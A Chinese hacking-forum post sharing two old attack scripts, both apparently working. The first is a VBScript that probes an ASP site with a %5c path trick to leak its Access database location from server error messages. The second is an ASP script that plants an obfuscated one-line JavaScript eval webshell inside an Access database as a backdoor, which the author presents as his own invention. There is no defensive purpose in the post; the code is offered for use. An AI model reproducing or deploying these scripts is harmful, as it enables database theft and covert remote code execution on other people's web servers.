华域联盟 vbs N年前的两个脚本暴库

N年前的两个脚本暴库

Dim xStatus,tStatus,vServer,vHeader,vRsBody

GetError=InputBox("请输入网站,例如:http://www.hackerxfiles.com/files/list.asp?id=415","请输入网址","http://www.hackerxfiles.com/files/list.asp?id=415")

If GetError = "" Then

MsgBox("输入错误,程序结束!")

WScript.Quit

End If

GetError=StrReverse(GetError)

Tem2=0

For I=1 To Len(GetError)

If Mid(GetError,I,1) = Chr(47) And Tem2=0 Then

Temp=Temp & "c5%"

Tem2=Tem2+1

Else

Temp=Temp & Mid(GetError,I,1)

End If

Next

GetError=StrReverse(Temp)

Call xmlPost(GetError)

ErrorText = vServer & " " & xStatus

BaseSaver = GetStr(vRsBody,"找不到文件 '","'。</font>" & Chr(10))

If BaseSaver="[None]" Then

BaseSaver = GetStr(vRsBody,"<font face="&Chr(34)&"宋体"&Chr(34)&" size=2>'","'不是一个有效的路径。")

End If

If BaseSaver="[None]" Then

BaseSaver = GetStr(vRsBody,"打开注册表关键字 '","'。</font>")

End If

If BaseSaver = "[None]" Then

AllReturn= "<TITLE>Mappath出错获取数据库地址 Lilo</TITLE><Body scroll='no' bgcolor='menu' style='border:0pt;margin-left:5pt'><B>" & ErrorText & "</B><BR><BR><textarea rows='15' name='S1' cols='57'>" &vRsBody& "</textarea>"

Else

AllReturn= "<TITLE>Mappath出错获取数据库地址 Lilo</TITLE><Body scroll='no' bgcolor='menu' style='border:0pt;margin-left:5pt'><B>" & ErrorText & "</B><BR><BR><textarea rows='15' name='S1' cols='57'>" &BaseSaver& "</textarea>"

End If

Call OpenWin(AllReturn)

Set WHShell = WScript.CreateObject("WScript.Shell")

WHShell.AppActivate "Mappath出错获取数据库地址 Lilo"

'WHShell.SendKeys ("%{TAB}")

Set WHShell = Nothing

Function URLEncoding(vstrIn)

strReturn = ""

For i = 1 To Len(vstrIn)

ThisChr = Mid(vStrIn,i,1)

If Abs(Asc(ThisChr)) < &HFF Then

strReturn = strReturn & ThisChr

Else

innerCode = Asc(ThisChr)

If innerCode < 0 Then

innerCode = innerCode + &H10000

End If

Hight8 = (innerCode And &HFF00)\ &HFF

Low8 = innerCode And &HFF

strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)

End If

Next

URLEncoding = strReturn

End Function

Function bytes2BSTR(vIn)

strReturn = ""

For i = 1 To LenB(vIn)

ThisCharCode = AscB(MidB(vIn,i,1))

If ThisCharCode < &H80 Then

strReturn = strReturn & Chr(ThisCharCode)

Else

NextCharCode = AscB(MidB(vIn,i+1,1))

strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))

i = i + 1

End If

Next

bytes2BSTR = strReturn

End Function

Function xmlPost(iURL)

On Error Resume Next

iPost=URLEncoding(iPost)

Set xPost = CreateObject("Microsoft.XMLHTTP")

xPost.open "POST",iURL,False

xPost.Send

xStatus = xPost.Status

tStatus = xPost.StatusText

vServer = xPost.GetResponseHeader("Server")

vHeader = xPost.GetAllResponseHeaders

vRsBody = bytes2BSTR(xPost.responseBody)

Set xPost = Nothing

End Function

Function GetStr(vString,iString,dString)

vSum = inStr(vRsBody,iString)

If vSum = 0 Then GetStr="[None]" : Exit Function

eSum = inStr(vSum,vRsBody,dString)

If eSum = 0 Then GetStr="[None]" : Exit Function

GetStr = Mid(vRsBody,vSum+Len(iString),eSum-vSum-Len(iString))

End Function

Function IntToStr(vNum,vLen)

If Len(vNum) >= vLen Then IntToStr = vNum : Exit Function

For I=1 To vLen-Len(vNum)

IntToStr=IntToStr & "0"

Next

IntToStr = IntToStr & CStr(vNum)

End Function

Function GetSplit(unStr,vaStr,Mode)

aTemp = Split(unStr,vaStr)

bTemp = Ubound(aTemp)

Select Case Mode

Case -1: GetSplit = aTemp

Case -2: GetSplit = bTemp

End Select

If Mode < 0 Then Exit Function

If Mode > bTemp Then GetSplit=False : Exit Function

If Mode >= 0 Then GetSplit = aTemp(Mode)

End Function

Function OpenWin(vTTv)

Set IE = WScript.CreateObject("InternetExplorer.Application")

IE.Navigate "about:blank"

IE.Visible = 1 

IE.ToolBar = 0

IE.StatusBar = 0

IE.Width=500

IE.Height=335

Do While (IE.Busy): Loop

Set Doc = IE.Document

Doc.Open

Execute "Doc.Writeln " & Chr(34) & vTTv & Chr(34)

Doc.Close

Set IE=Nothing

End Function

另一个是我写的,向access里插入asp代码来当作后门,这应当是我的首创了,不过我也不知其他人有没有更早提前发现的。后来网上就流传开直接向数据库插入一句话来得到webshell。不知不觉时光飞逝,4年过去了,人老了,难道只能怀旧吗?

<%

db="0123.asp" '这里改成您的数据库地址

set conn=server.createobject("Adodb.Connection")

connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath(db)

conn.open connstr

'添加notdownload表

conn.execute("create table notdownload(notdown oleobject)")

'写入<%数据

set rs=server.createobject("adodb.recordset")

    sql="select * from notdownload"

rs.open sql,conn,1,3

rs.addnew

    rs("notdown").appendchunk(chrB(asc("<")) & chrB(asc("s")) & chrB(asc("c"))& chrB(asc("r")) & chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(" "))& chrB(asc("r"))& chrB(asc("u"))& chrB(asc("n"))& chrB(asc("a"))& chrB(asc("t"))& chrB(asc("="))& chrB(asc("s"))& chrB(asc("e"))& chrB(asc("r"))& chrB(asc("v"))& chrB(asc("e"))& chrB(asc("r"))& chrB(asc(" "))& chrB(asc("l"))& chrB(asc("a"))& chrB(asc("n"))& chrB(asc("g"))& chrB(asc("u"))& chrB(asc("a"))& chrB(asc("g"))& chrB(asc("e"))& chrB(asc("="))& chrB(asc("j"))& chrB(asc("a"))& chrB(asc("v"))& chrB(asc("a"))& chrB(asc("s"))& chrB(asc("c"))& chrB(asc("r"))& chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(">"))& chrB(asc("e"))& chrB(asc("v"))& chrB(asc("a"))& chrB(asc("l"))& chrB(asc("("))& chrB(asc("r"))& chrB(asc("e"))& chrB(asc("q"))& chrB(asc("u"))& chrB(asc("e"))& chrB(asc("s"))& chrB(asc("t"))& chrB(asc("."))& chrB(asc("f"))& chrB(asc("o"))& chrB(asc("r"))& chrB(asc("m"))& chrB(asc("("))& chrB(asc("'"))& chrB(asc("#"))& chrB(asc("'"))& chrB(asc(")"))& chrB(asc("+"))& chrB(asc("'"))& chrB(asc("'"))& chrB(asc(")"))& chrB(asc("<"))& chrB(asc("/"))& chrB(asc("s"))& chrB(asc("c"))& chrB(asc("r"))& chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(">")))

    rs.update

    rs.close

set rs=nothing

'关闭连接

conn.close

set conn=nothing

%>

本文由 华域联盟 原创撰写:华域联盟 » N年前的两个脚本暴库

转载请保留出处和原文链接:https://www.cnhackhy.com/14918.htm

本文来自网络,不代表华域联盟立场,转载请注明出处。

作者: sterben

发表回复

联系我们

联系我们

2551209778

在线咨询: QQ交谈

邮箱: [email protected]

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部